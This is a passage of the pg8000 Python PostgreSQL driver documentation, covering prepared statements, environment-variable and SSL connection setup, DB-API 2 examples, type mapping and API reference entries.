[[True]]

----

Another way is to override the type that pg8000 sends along with each
parameter:

[source,python]
----

>>> con.run("SELECT :v IS NULL", v=None, types={'v': pg8000.native.TIMESTAMP})
[[True]]

----


=== Prepared Statements

https://www.postgresql.org/docs/current/sql-prepare.html[Prepared statements]
can be useful in improving performance when you have a statement that's
executed repeatedly.
Here's an example:


[source,python]
----

>>> # Create the prepared statement
>>> ps = con.prepare("SELECT cast(:v as varchar)")
>>>
>>> # Execute the statement repeatedly
>>> ps.run(v="speedy")
[['speedy']]
>>> ps.run(v="rapid")
[['rapid']]
>>> ps.run(v="swift")
[['swift']]
>>>
>>> # Close the prepared statement, releasing resources on the server
>>> ps.close()

----


=== Use Environment Variables As Connection Defaults

You might want to use the current user as the database username, for example:

[source,python]
----

>>> import pg8000
>>> import getpass
>>>
>>> # Connect to the database with current user name
>>> username = getpass.getuser()
>>> connection = pg8000.native.Connection(username, password="cpsnow")
>>>
>>> connection.run("SELECT 'pilau'")
[['pilau']]

----

or perhaps you may want to use some of the same
https://www.postgresql.org/docs/current/libpq-envars.html[environment variables
that libpq uses]:

[source,python]
----

>>> import pg8000
>>> from os import environ
>>>
>>> username = environ.get('PGUSER', 'postgres')
>>> password = environ.get('PGPASSWORD', 'cpsnow')
>>> host = environ.get('PGHOST', 'localhost')
>>> port = environ.get('PGPORT', '5432')
>>> database = environ.get('PGDATABASE')
>>>
>>> connection = pg8000.native.Connection(
...     username, password=password, host=host, port=port, database=database)
>>>
>>> connection.run("SELECT 'Mr Cairo'")
[['Mr Cairo']]

----

It might be asked, why doesn't pg8000 have this behaviour built in? The
thinking follows the second aphorism of
https://www.python.org/dev/peps/pep-0020/[The Zen of Python]:

[quote]
Explicit is better than implicit.

So we've taken the approach of only being able to set connection parameters
using the `pg8000.native.Connection()` constructor.


=== Connect To PostgreSQL Over SSL

To connect to the server using SSL defaults do:

[source,python]
----

import pg8000.native


connection = pg8000.native.Connection(
    username, password="cpsnow", ssl_context=True)
connection.run("SELECT 'The game is afoot!'")

----

To connect over SSL with custom settings, set the `ssl_context` parameter to
an https://docs.python.org/3/library/ssl.html#ssl.SSLContext[`ssl.SSLContext`]
object:

[source,python]
----

import pg8000.native
import ssl


ssl_context = ssl.SSLContext()
ssl_context.verify_mode = ssl.CERT_REQUIRED
ssl_context.load_verify_locations('root.pem')
connection = pg8000.native.Connection(
    username, password="cpsnow", ssl_context=ssl_context)

----

It may be that your PostgreSQL server is behind an SSL proxy server, in which
case you can set the pg8000-specific attribute
`ssl.SSLContext.request_ssl = False`, which tells pg8000 to connect using an
SSL socket, but not to request SSL from the PostgreSQL server:

[source,python]
----

import pg8000.native
import ssl


ssl_context = ssl.SSLContext()
ssl_context.request_ssl = False
connection = pg8000.native.Connection(
    username, password="cpsnow", ssl_context=ssl_context)

----


== DB-API 2 Interactive Examples

These examples stick to the DB-API 2.0 standard.


=== Basic Example

Import pg8000, connect to the database, create a table, add some rows and then
query the table:

[source,python]
----
>>> import pg8000
>>>
>>> conn = pg8000.dbapi.connect(user="postgres", password="cpsnow")
>>> cursor = conn.cursor()
>>> cursor.execute("CREATE TEMPORARY TABLE book (id SERIAL, title TEXT)")
>>> cursor.execute(
...     "INSERT INTO book (title) VALUES (%s), (%s) RETURNING id, title",
...     ("Ender's Game", "Speaker for the Dead"))
>>> results = cursor.fetchall()
>>> for row in results:
...     id, title = row
...     print("id = %s, title = %s" % (id, title))
id = 1, title = Ender's Game
id = 2, title = Speaker for the Dead
>>> conn.commit()

----


=== Query Using Functions

Another query, using some PostgreSQL functions:

[source,python]
----
>>> cursor.execute("SELECT extract(millennium from now())")
>>> cursor.fetchone()
[3.0]

----


=== Interval Type

A query that returns the PostgreSQL interval type:

[source,python]
----
>>> import datetime
>>> cursor.execute("SELECT timestamp '2013-12-01 16:06' - %s",
...     (datetime.date(1980, 4, 27),))
>>> cursor.fetchone()
[datetime.timedelta(days=12271, seconds=57960)]

----


=== Point Type

A round-trip with a
https://www.postgresql.org/docs/current/datatype-geometric.html[PostgreSQL
point] type:

[source,python]
----
>>> cursor.execute("SELECT cast(%s as point)", ('(2.3,1)',))
>>> cursor.fetchone()
['(2.3,1)']

----


=== Numeric Parameter Style

pg8000 supports all the DB-API parameter styles. Here's an example of using
the 'numeric' parameter style:

[source,python]
----
>>> pg8000.dbapi.paramstyle = "numeric"
>>> cursor = conn.cursor()
>>> cursor.execute("SELECT array_prepend(:1, :2)", (500, [1, 2, 3, 4]))
>>> cursor.fetchone()
[[500, 1, 2, 3, 4]]
>>> pg8000.dbapi.paramstyle = "format"
>>> conn.rollback()

----


=== Autocommit

Following the DB-API specification, autocommit is off by default. It can be
turned on by using the autocommit property of the connection:

[source,python]
----
>>> conn.autocommit = True
>>> cur = conn.cursor()
>>> cur.execute("vacuum")
>>> conn.autocommit = False
>>> cur.close()

----


=== Client Encoding

When communicating with the server, pg8000 uses the character set that the
server asks it to use (the client encoding). By default the client encoding is
the database's character set (chosen when the database is created), but the
client encoding can be changed in a number of ways (eg. setting
CLIENT_ENCODING in postgresql.conf). Another way of changing the client
encoding is by using an SQL command. For example:

[source,python]
----
>>> cur = conn.cursor()
>>> cur.execute("SET CLIENT_ENCODING TO 'UTF8'")
>>> cur.execute("SHOW CLIENT_ENCODING")
>>> cur.fetchone()
['UTF8']
>>> cur.close()

----


=== JSON

JSON is sent to the server serialized, and returned de-serialized.
Here's an
example:

[source,python]
----
>>> import json
>>> cur = conn.cursor()
>>> val = ['Apollo 11 Cave', True, 26.003]
>>> cur.execute("SELECT cast(%s as json)", (json.dumps(val),))
>>> cur.fetchone()
[['Apollo 11 Cave', True, 26.003]]
>>> cur.close()

----


=== Retrieve Column Names From Results

Use the column names retrieved from a query:

[source,python]
----
>>> import pg8000
>>> conn = pg8000.dbapi.connect(user="postgres", password="cpsnow")
>>> c = conn.cursor()
>>> c.execute("create temporary table quark (id serial, name text)")
>>> c.executemany("INSERT INTO quark (name) VALUES (%s)", (("Up",), ("Down",)))
>>> #
>>> # Now retrieve the results
>>> #
>>> c.execute("select * from quark")
>>> rows = c.fetchall()
>>> keys = [k[0] for k in c.description]
>>> results = [dict(zip(keys, row)) for row in rows]
>>> assert results == [{'id': 1, 'name': 'Up'}, {'id': 2, 'name': 'Down'}]

----


=== Notices

PostgreSQL https://www.postgresql.org/docs/current/static/plpgsql-errors-and-messages.html[notices]
are stored in a deque called `Connection.notices` and added using the
`append()` method. Similarly there are `Connection.notifications` for
https://www.postgresql.org/docs/current/static/sql-notify.html[notifications]
and `Connection.parameter_statuses` for changes to the server configuration.
Here's an example:

[source,python]
----
>>> cur = conn.cursor()
>>> cur.execute("LISTEN aliens_landed")
>>> cur.execute("NOTIFY aliens_landed")
>>> conn.commit()
>>> conn.notifications[0][1]
'aliens_landed'

----


=== COPY from and to a file

The SQL https://www.postgresql.org/docs/current/sql-copy.html[COPY] statement
can be used to copy from and to a file or file-like object:

[source,python]
----

>>> from io import BytesIO
>>> #
>>> # COPY from a stream to a table
>>> #
>>> stream_in = BytesIO(b'1\telectron\n2\tmuon\n3\ttau\n')
>>> cur = conn.cursor()
>>> cur.execute("create temporary table lepton (id serial, name text)")
>>> cur.execute("COPY lepton FROM stdin", stream=stream_in)
>>> #
>>> # Now COPY from a table to a stream
>>> #
>>> stream_out = BytesIO()
>>> cur.execute("copy lepton to stdout", stream=stream_out)
>>> stream_out.getvalue()
b'1\telectron\n2\tmuon\n3\ttau\n'

----


== Type Mapping

The following table shows the default mapping between Python types and
PostgreSQL types, and vice versa.

If pg8000 doesn't recognize a type that it receives from PostgreSQL, it will
return it as a `str` type. This is how pg8000 handles PostgreSQL `enum` and
XML types.
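For example (an illustrative sketch using the native `con` connection from
the earlier examples; the `mood` enum type is made up for the illustration):

[source,python]
----
>>> con.run("CREATE TYPE mood AS ENUM ('sad', 'ok', 'happy')")
[]
>>> con.run("SELECT CAST('ok' AS mood)")
[['ok']]

----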
It's possible to change the default mapping using adapters (see the
examples).

.Python to PostgreSQL Type Mapping
|===
| Python Type | PostgreSQL Type | Notes

| bool
| bool
|

| int
| int4
|

| str
| text
|

| float
| float8
|

| decimal.Decimal
| numeric
|

| bytes
| bytea
|

| datetime.datetime (without tzinfo)
| timestamp without time zone
| See note below.

| datetime.datetime (with tzinfo)
| timestamp with time zone
| See note below.

| datetime.date
| date
| See note below.

| datetime.time
| time without time zone
|

| datetime.timedelta
| interval
|

| None
| NULL
|

| uuid.UUID
| uuid
|

| ipaddress.IPv4Address
| inet
|

| ipaddress.IPv6Address
| inet
|

| ipaddress.IPv4Network
| inet
|

| ipaddress.IPv6Network
| inet
|

| int
| xid
|

| list of int
| INT4[]
|

| list of float
| FLOAT8[]
|

| list of bool
| BOOL[]
|

| list of str
| TEXT[]
|

| int
| int2vector
| Only from PostgreSQL to Python

| JSON
| json, jsonb
| The Python JSON is provided as a Python serialized string. Results are
  returned as de-serialized JSON.
|===


[[_theory_of_operation]]
== Theory Of Operation

{empty} +

[quote, Jochen Liedtke, Liedtke's minimality principle]
____
A concept is tolerated inside the microkernel only if moving it outside the
kernel, i.e., permitting competing implementations, would prevent the
implementation of the system's required functionality.
____


pg8000 is designed to be used with one thread per connection.

Pg8000 communicates with the database using the
http://www.postgresql.org/docs/current/static/protocol.html[PostgreSQL
Frontend/Backend Protocol] (FEBE). By default, pg8000 uses unnamed prepared
statements. It uses the Extended Query feature of the FEBE. So the steps are:

. Query comes in.
. Send a PARSE message to the server to create an unnamed prepared statement.
. Send a BIND message to run against the unnamed prepared statement, resulting
  in an unnamed portal on the server.
. Send an EXECUTE message to read all the results from the portal.

It's also possible to use named prepared statements, in which case the
prepared statement persists on the server and is represented in pg8000 by a
PreparedStatement object. This means that the PARSE step gets executed once up
front, and then only the BIND and EXECUTE steps are repeated subsequently.

There are a lot of PostgreSQL data types, but few primitive data types in
Python. A PostgreSQL data type has to be assigned to each query parameter,
which is impossible to work out in all cases. In these cases an adapter can be
used for the parameter to indicate its type, or sometimes an
https://www.postgresql.org/docs/current/static/sql-expressions.html#SQL-SYNTAX-TYPE-CASTS[explicit cast] can be used in the SQL.

In the FEBE protocol, each query parameter can be sent to the server either as
binary or text according to the format code. In pg8000 the parameters are
always sent as text.

* PostgreSQL has +/-infinity values for dates and timestamps, but Python does
  not. Pg8000 handles this by returning +/-infinity strings in results, and in
  parameters the strings 'infinity' and '-infinity' can be used (see the
  sketch after this list).

* PostgreSQL dates/timestamps can have values outside the range of Python
  datetimes. These are handled using the underlying PostgreSQL storage method.
  I don't know of any users of pg8000 that use this feature, so get in touch
  if it affects you.

* Occasionally, the network connection between pg8000 and the server may go
  down. If pg8000 encounters a network problem it'll raise an `InterfaceError`
  with an error message starting with `network error` and with the original
  exception set as the
  https://docs.python.org/3/reference/simple_stmts.html#the-raise-statement[cause].
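As a small illustration of the first point above (a sketch using the native
`con` connection from the earlier examples):

[source,python]
----
>>> con.run("SELECT CAST('infinity' AS timestamp)")
[['infinity']]

----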
== Native API Docs

=== pg8000.native.Connection(user, host='localhost', database=None, port=5432, password=None, source_address=None, unix_sock=None, ssl_context=None, timeout=None, tcp_keepalive=True, application_name=None, replication=None)

Creates a connection to a PostgreSQL database.

user::
  The username to connect to the PostgreSQL server with. If your server
  character encoding is not `ascii` or `utf8`, then you need to provide
  `user` as bytes, eg. `'my_name'.encode('EUC-JP')`.

host::
  The hostname of the PostgreSQL server to connect with. Providing this
  parameter is necessary for TCP/IP connections. One of either `host` or
  `unix_sock` must be provided. The default is `localhost`.

database::
  The name of the database instance to connect with. If `None` then the
  PostgreSQL server will assume the database name is the same as the username.
  If your server character encoding is not `ascii` or `utf8`, then you need to
  provide `database` as bytes, eg. `'my_db'.encode('EUC-JP')`.

port::
  The TCP/IP port of the PostgreSQL server instance. This parameter defaults
  to `5432`, the registered common port of PostgreSQL TCP/IP servers.

password::
  The user password to connect to the server with. This parameter is optional;
  if omitted and the database server requests password-based authentication,
  the connection will fail to open. If this parameter is provided but not
  requested by the server, no error will occur. +
  +
  If your server character encoding is not `ascii` or `utf8`, then
  you need to provide `password` as bytes, eg.
  `'my_password'.encode('EUC-JP')`.


source_address::
  The source IP address which initiates the connection to the PostgreSQL
  server. The default is `None` which means that the operating system will
  choose the source address.

unix_sock::
  The path to the UNIX socket to access the database through, for example,
  `'/tmp/.s.PGSQL.5432'`. One of either `host` or `unix_sock` must be provided.

ssl_context::
  This governs SSL encryption for TCP/IP sockets. It can have three values:
  * `None`, meaning no SSL (the default)
  * `True`, meaning use SSL with an
    https://docs.python.org/3/library/ssl.html#ssl.SSLContext[`ssl.SSLContext`]
    created using
    https://docs.python.org/3/library/ssl.html#ssl.create_default_context[`ssl.create_default_context()`]
  * An instance of
    https://docs.python.org/3/library/ssl.html#ssl.SSLContext[`ssl.SSLContext`]
    which will be used to create the SSL connection. +
  +
  If your PostgreSQL server is behind an SSL proxy, you can set the
  pg8000-specific attribute `ssl.SSLContext.request_ssl = False`, which
  tells pg8000 to use an SSL socket, but not to request SSL from the
  PostgreSQL server. Note that this means you can't use SCRAM
  authentication with channel binding.

timeout::
  This is the time in seconds before the connection to the server will time
  out. The default is `None` which means no timeout.

tcp_keepalive::
  If `True` then use
  https://en.wikipedia.org/wiki/Keepalive#TCP_keepalive[TCP keepalive]. The
  default is `True`.

application_name::
  Sets the https://www.postgresql.org/docs/current/runtime-config-logging.html#GUC-APPLICATION-NAME[application_name].
  If your server character encoding is not `ascii` or `utf8`, then you need to
  provide values as bytes, eg. `'my_application_name'.encode('EUC-JP')`. The
  default is `None` which means that the server will set the application name.

replication::
  Used to run in https://www.postgresql.org/docs/12/protocol-replication.html[streaming replication mode].
  If your server character encoding is not `ascii` or `utf8`, then you need to
  provide values as bytes, eg. `'database'.encode('EUC-JP')`.


=== pg8000.native.Error

Generic exception that is the base exception of the other error exceptions.


=== pg8000.native.InterfaceError

For errors that originate within pg8000.


=== pg8000.native.DatabaseError

For errors that originate from the server.

=== pg8000.native.Connection.notifications

A deque of server-side
https://www.postgresql.org/docs/current/sql-notify.html[notifications] received
by this database connection (via the LISTEN / NOTIFY PostgreSQL commands). Each
list item is a three-element tuple containing the PostgreSQL backend PID that
issued the notify, the channel and the payload.


=== pg8000.native.Connection.notices

A deque of server-side notices received by this database connection.


=== pg8000.native.Connection.parameter_statuses

A deque of server-side parameter statuses received by this database connection.


=== pg8000.native.Connection.run(sql, stream=None, types=None, **kwargs)

Executes an SQL statement, and returns the results as a `list`. For example:

`con.run("SELECT * FROM cities where population > :pop", pop=10000)`

sql::
  The SQL statement to execute. Parameter placeholders appear as a `:` followed
  by the parameter name.

stream::
  For use with the PostgreSQL
  http://www.postgresql.org/docs/current/static/sql-copy.html[COPY] command.
  For a `COPY FROM` the parameter must be a readable file-like object, and for
  `COPY TO` it must be writable.

types::
  A dictionary of oids: each key is a parameter name, and each value is the
  oid of the PostgreSQL type to use for that parameter.

kwargs::
  The parameters of the SQL statement.


=== pg8000.native.Connection.row_count

This read-only attribute contains the number of rows that the last `run()`
method produced (for query statements like `SELECT`) or affected (for
modification statements like `UPDATE`).

The value is -1 if:

* No `run()` method has been performed yet.
* There was no rowcount associated with the last `run()`.
* Using a `SELECT` query statement on a PostgreSQL server older than version
  9.
* Using a `COPY` query statement on PostgreSQL server version 8.1 or older.
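For example (a sketch continuing with the native `con` connection and the
`book` table from the interactive examples above, so the row values shown are
those left by the transaction examples):

[source,python]
----
>>> con.run("SELECT * FROM book")
[[1, "Ender's Game"], [2, 'The Magus'], [3, 'Phineas Finn']]
>>> con.row_count
3

----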
=== pg8000.native.Connection.columns

A list of column metadata. Each item in the list is a dictionary with the
following keys:

* name
* table_oid
* column_attrnum
* type_oid
* type_size
* type_modifier
* format


=== pg8000.native.Connection.close()

Closes the database connection.


=== pg8000.native.Connection.register_out_adapter(typ, oid, out_func)

Register a type adapter for types going out from pg8000 to the server.

typ::
  The Python class that the adapter is for.

oid::
  The PostgreSQL type identifier found in the
  https://www.postgresql.org/docs/current/catalog-pg-type.html[pg_type system
  catalog].

out_func::
  A function that takes the Python object and returns its string
  representation in the format that the server requires.


=== pg8000.native.Connection.register_in_adapter(oid, in_func)

Register a type adapter for types coming in from the server to pg8000.

oid::
  The PostgreSQL type identifier found in the
  https://www.postgresql.org/docs/current/catalog-pg-type.html[pg_type system
  catalog].

in_func::
  A function that takes the PostgreSQL string representation and returns
  a corresponding Python object.


=== pg8000.native.Connection.prepare(sql)

Returns a PreparedStatement object which represents a
https://www.postgresql.org/docs/current/sql-prepare.html[prepared statement] on
the server. It can subsequently be repeatedly executed as shown in the
<<_prepared_statements, example>>.

sql::
  The SQL statement to prepare. Parameter placeholders appear as a `:` followed
  by the parameter name.


=== pg8000.native.PreparedStatement

A prepared statement object is returned by the
`pg8000.native.Connection.prepare()` method of a connection. It has the
following methods:


=== pg8000.native.PreparedStatement.run(**kwargs)

Executes the prepared statement, and returns the results as a `tuple`.

kwargs::
  The parameters of the prepared statement.


=== pg8000.native.PreparedStatement.close()

Closes the prepared statement, releasing the prepared statement held on the
server.


== DB-API 2 Docs


=== Properties


==== pg8000.dbapi.apilevel

The DBAPI level supported, currently "2.0".

This property is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


==== pg8000.dbapi.threadsafety

Integer constant stating the level of thread safety the DBAPI interface
supports. For pg8000, the threadsafety value is 1, meaning that threads may
share the module but not connections.

This property is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

==== pg8000.dbapi.paramstyle

String property stating the type of parameter marker formatting expected by
the interface. This value defaults to "format", in which parameters are
marked in this format: "WHERE name=%s".

This property is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

As an extension to the DBAPI specification, this value is not constant; it
can be changed to any of the following values:

qmark::
  Question mark style, eg. `WHERE name=?`

numeric::
  Numeric positional style, eg. `WHERE name=:1`

named::
  Named style, eg. `WHERE name=:paramname`

format::
  printf format codes, eg. `WHERE name=%s`

pyformat::
  Python format codes, eg. `WHERE name=%(paramname)s`
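For instance, switching to `qmark` (an illustrative sketch mirroring the
'numeric' example in the interactive section above, using the same `conn`):

[source,python]
----
>>> pg8000.dbapi.paramstyle = "qmark"
>>> cursor = conn.cursor()
>>> cursor.execute("SELECT ?", ("cheese",))
>>> cursor.fetchone()
['cheese']
>>> pg8000.dbapi.paramstyle = "format"

----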
==== pg8000.dbapi.STRING

String type oid.

==== pg8000.dbapi.BINARY

Binary type oid.


==== pg8000.dbapi.NUMBER

Numeric type oid.


==== pg8000.dbapi.DATETIME

Timestamp type oid.


==== pg8000.dbapi.ROWID

ROWID type oid.


=== Functions

==== pg8000.dbapi.connect(user, host='localhost', database=None, port=5432, password=None, source_address=None, unix_sock=None, ssl_context=None, timeout=None, tcp_keepalive=True, application_name=None, replication=None)

Creates a connection to a PostgreSQL database.

This function is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

user::
  The username to connect to the PostgreSQL server with. If your server
  character encoding is not `ascii` or `utf8`, then you need to provide
  `user` as bytes, eg. `'my_name'.encode('EUC-JP')`.

host::
  The hostname of the PostgreSQL server to connect with. Providing this
  parameter is necessary for TCP/IP connections. One of either `host` or
  `unix_sock` must be provided. The default is `localhost`.

database::
  The name of the database instance to connect with. If `None` then the
  PostgreSQL server will assume the database name is the same as the username.
  If your server character encoding is not `ascii` or `utf8`, then you need to
  provide `database` as bytes, eg. `'my_db'.encode('EUC-JP')`.

port::
  The TCP/IP port of the PostgreSQL server instance. This parameter defaults
  to `5432`, the registered common port of PostgreSQL TCP/IP servers.

password::
  The user password to connect to the server with. This parameter is optional;
  if omitted and the database server requests password-based authentication,
  the connection will fail to open. If this parameter is provided but not
  requested by the server, no error will occur. +
  +
  If your server character encoding is not `ascii` or `utf8`, then
  you need to provide `password` as bytes, eg.
  `'my_password'.encode('EUC-JP')`.


source_address::
  The source IP address which initiates the connection to the PostgreSQL
  server. The default is `None` which means that the operating system will
  choose the source address.

unix_sock::
  The path to the UNIX socket to access the database through, for example,
  `'/tmp/.s.PGSQL.5432'`. One of either `host` or `unix_sock` must be provided.

ssl_context::
  This governs SSL encryption for TCP/IP sockets. It can have three values:
  * `None`, meaning no SSL (the default)
  * `True`, meaning use SSL with an
    https://docs.python.org/3/library/ssl.html#ssl.SSLContext[`ssl.SSLContext`]
    created using
    https://docs.python.org/3/library/ssl.html#ssl.create_default_context[`ssl.create_default_context()`]
  * An instance of
    https://docs.python.org/3/library/ssl.html#ssl.SSLContext[`ssl.SSLContext`]
    which will be used to create the SSL connection. +
  +
  If your PostgreSQL server is behind an SSL proxy, you can set the
  pg8000-specific attribute `ssl.SSLContext.request_ssl = False`, which
  tells pg8000 to use an SSL socket, but not to request SSL from the
  PostgreSQL server. Note that this means you can't use SCRAM
  authentication with channel binding.

timeout::
  This is the time in seconds before the connection to the server will time
  out. The default is `None` which means no timeout.

tcp_keepalive::
  If `True` then use
  https://en.wikipedia.org/wiki/Keepalive#TCP_keepalive[TCP keepalive].
The default is `True`.

application_name::
  Sets the https://www.postgresql.org/docs/current/runtime-config-logging.html#GUC-APPLICATION-NAME[application_name].
  If your server character encoding is not `ascii` or `utf8`, then you need to
  provide values as bytes, eg. `'my_application_name'.encode('EUC-JP')`. The
  default is `None` which means that the server will set the application name.

replication::
  Used to run in https://www.postgresql.org/docs/12/protocol-replication.html[streaming replication mode].
  If your server character encoding is not `ascii` or `utf8`, then you need to
  provide values as bytes, eg. `'database'.encode('EUC-JP')`.


==== pg8000.dbapi.Date(year, month, day)

Construct an object holding a date value.

This function is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

Returns: `datetime.date`


==== pg8000.dbapi.Time(hour, minute, second)

Construct an object holding a time value.

This function is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

Returns: `datetime.time`


==== pg8000.dbapi.Timestamp(year, month, day, hour, minute, second)

Construct an object holding a timestamp value.

This function is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

Returns: `datetime.datetime`


==== pg8000.dbapi.DateFromTicks(ticks)

Construct an object holding a date value from the given ticks value (number of
seconds since the epoch).

This function is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

Returns: `datetime.date`


==== pg8000.dbapi.TimeFromTicks(ticks)

Construct an object holding a time value from the given ticks value (number of
seconds since the epoch).

This function is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

Returns: `datetime.time`


==== pg8000.dbapi.TimestampFromTicks(ticks)

Construct an object holding a timestamp value from the given ticks value
(number of seconds since the epoch).


This function is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

Returns: `datetime.datetime`


==== pg8000.dbapi.Binary(value)

Construct an object holding binary data.

This function is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

Returns: `bytes`.


=== Generic Exceptions

Pg8000 uses the standard DBAPI 2.0 exception tree as "generic" exceptions.
Generally, more specific exception types are raised; these specific exception
types are derived from the generic exceptions.

==== pg8000.dbapi.Warning

Generic exception raised for important database warnings like data truncations.
This exception is not currently used by pg8000.

This exception is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

==== pg8000.dbapi.Error

Generic exception that is the base exception of all other error exceptions.

This exception is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


==== pg8000.dbapi.InterfaceError

Generic exception raised for errors that are related to the database interface
rather than the database itself.
For example, if the interface attempts to use an SSL connection but the
server refuses, an InterfaceError will be raised.

This exception is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


==== pg8000.dbapi.DatabaseError

Generic exception raised for errors that are related to the database. This
exception is currently never raised by pg8000.

This exception is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


==== pg8000.dbapi.DataError

Generic exception raised for errors that are due to problems with the
processed data. This exception is not currently raised by pg8000.

This exception is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


==== pg8000.dbapi.OperationalError

Generic exception raised for errors that are related to the database's
operation and not necessarily under the control of the programmer. This
exception is currently never raised by pg8000.

This exception is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


==== pg8000.dbapi.IntegrityError

Generic exception raised when the relational integrity of the database is
affected. This exception is not currently raised by pg8000.

This exception is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


==== pg8000.dbapi.InternalError

Generic exception raised when the database encounters an internal error. This
is currently only raised when unexpected state occurs in the pg8000 interface
itself, and is typically the result of an interface bug.

This exception is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


==== pg8000.dbapi.ProgrammingError

Generic exception raised for programming errors. For example, this exception
is raised if more parameter fields are in a query string than there are
available parameters.

This exception is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


==== pg8000.dbapi.NotSupportedError

Generic exception raised in case a method or database API was used which is
not supported by the database.

This exception is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


=== Classes


==== pg8000.dbapi.Connection

A connection object is returned by the `pg8000.dbapi.connect()` function. It
represents a single physical connection to a PostgreSQL database.

===== pg8000.dbapi.Connection.notifications

A deque of server-side
https://www.postgresql.org/docs/current/sql-notify.html[notifications] received
by this database connection (via the LISTEN / NOTIFY PostgreSQL commands). Each
list item is a three-element tuple containing the PostgreSQL backend PID that
issued the notify, the channel and the payload.

This attribute is not part of the DBAPI standard; it is a pg8000 extension.


===== pg8000.dbapi.Connection.notices

A deque of server-side notices received by this database connection.

This attribute is not part of the DBAPI standard; it is a pg8000 extension.


===== pg8000.dbapi.Connection.parameter_statuses

A deque of server-side parameter statuses received by this database connection.

This attribute is not part of the DBAPI standard; it is a pg8000 extension.


===== pg8000.dbapi.Connection.autocommit

Following the DB-API specification, autocommit is off by default.
It can be
turned on by setting this boolean pg8000-specific autocommit property to
`True`.

New in version 1.9.


===== pg8000.dbapi.Connection.close()

Closes the database connection.

This function is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


===== pg8000.dbapi.Connection.cursor()

Creates a `pg8000.dbapi.Cursor` object bound to this connection.

This function is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


===== pg8000.dbapi.Connection.rollback()

Rolls back the current database transaction.

This function is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


===== pg8000.dbapi.Connection.tpc_begin(xid)

Begins a TPC transaction with the given transaction ID xid. This method should
be called outside of a transaction (i.e. nothing may have executed since the
last `commit()` or `rollback()`). Furthermore, it is an error to call
`commit()` or `rollback()` within the TPC transaction. A `ProgrammingError` is
raised if the application calls `commit()` or `rollback()` during an active
TPC transaction.

This function is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


===== pg8000.dbapi.Connection.tpc_commit(xid=None)

When called with no arguments, `tpc_commit()` commits a TPC transaction
previously prepared with `tpc_prepare()`. If `tpc_commit()` is called prior to
`tpc_prepare()`, a single phase commit is performed. A transaction manager may
choose to do this if only a single resource is participating in the global
transaction.

When called with a transaction ID `xid`, the database commits the given
transaction. If an invalid transaction ID is provided, a
`ProgrammingError` will be raised. This form should be called outside of
a transaction, and is intended for use in recovery.

On return, the TPC transaction is ended.

This function is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


===== pg8000.dbapi.Connection.tpc_prepare()

Performs the first phase of a transaction started with `tpc_begin()`. A
`ProgrammingError` is raised if this method is called outside of a TPC
transaction.

After calling `tpc_prepare()`, no statements can be executed until
`tpc_commit()` or `tpc_rollback()` have been called.

This function is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


===== pg8000.dbapi.Connection.tpc_recover()

Returns a list of pending transaction IDs suitable for use with
`tpc_commit(xid)` or `tpc_rollback(xid)`.

This function is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].


===== pg8000.dbapi.Connection.tpc_rollback(xid=None)

When called with no arguments, `tpc_rollback()` rolls back a TPC transaction.
It may be called before or after `tpc_prepare()`.

When called with a transaction ID xid, it rolls back the given transaction. If
an invalid transaction ID is provided, a `ProgrammingError` is raised.
This form should be called outside of a transaction, and is intended for use
in recovery.

On return, the TPC transaction is ended.

This function is part of the
http://www.python.org/dev/peps/pep-0249/[DBAPI 2.0 specification].

===== pg8000.dbapi.Connection.xid(format_id, global_transaction_id, branch_qualifier)

Creates a transaction ID. Only `global_transaction_id` is used in PostgreSQL;
`format_id` and `branch_qualifier` are ignored. `global_transaction_id` may be
any string identifier supported by PostgreSQL. Returns a tuple
`(format_id, global_transaction_id, branch_qualifier)`.
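Putting the TPC methods together (a minimal sketch, not from the examples
above: it assumes a regular, non-temporary table `book (title TEXT)` already
exists, and that the server is configured with `max_prepared_transactions`
greater than zero, which PostgreSQL requires for PREPARE TRANSACTION):

[source,python]
----
import pg8000.dbapi

conn = pg8000.dbapi.connect(user="postgres", password="cpsnow")

# Begin a two-phase transaction with a made-up global transaction ID
xid = conn.xid(0, "my-global-tx", "")
conn.tpc_begin(xid)

cur = conn.cursor()
cur.execute("INSERT INTO book (title) VALUES (%s)", ("Dune",))

# Phase one: prepare the transaction; phase two: commit it
conn.tpc_prepare()
conn.tpc_commit()

----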
==== pg8000.dbapi.Cursor

A cursor object is returned by the `pg8000.dbapi.Connection.cursor()` method
of a connection. It has the following attributes and methods:

===== pg8000.dbapi.Cursor.arraysize

This read/write attribute specifies the number of rows to fetch at a time with
`pg8000.dbapi.Cursor.fetchmany()`. It defaults to 1.


===== pg8000.dbapi.Cursor.connection

This read-only attribute contains a reference to the connection object
